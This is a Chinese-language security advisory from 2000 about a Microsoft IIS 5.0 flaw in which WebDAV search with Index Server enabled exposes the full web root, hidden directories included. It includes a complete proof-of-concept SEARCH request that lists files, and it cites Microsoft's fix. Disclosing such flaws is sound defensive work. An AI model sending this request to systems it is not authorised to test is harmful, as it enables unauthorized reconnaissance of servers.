Microsoft IIS 5.0 indexed目录可泄露漏洞发布时间:2000-10-10 更新时间:2000-10-10 严重程度:高 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 Microsoft IIS 5.0详细描述 如果在IIS5.0中的INDEX服务程序被使能,远程用户可以查看整个的ROOT目录结构, 这只要漏洞存在与web distribute authoring和Versioning (WebDAV) search implementation。 隐藏的目录,包括文件可以被查看到。 测试代码 在IIS5.0中默认安装了INDEX SERVER并目录有'index'属性才能被查看: SEARCH / HTTP/1.1 Host: target Content-Type: text/xml Content-Length: 133 <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> 解决方案 请查看微软发布的建议: http://www.microsoft.com/technet/support/kb.asp?ID=272079 相关信息 |
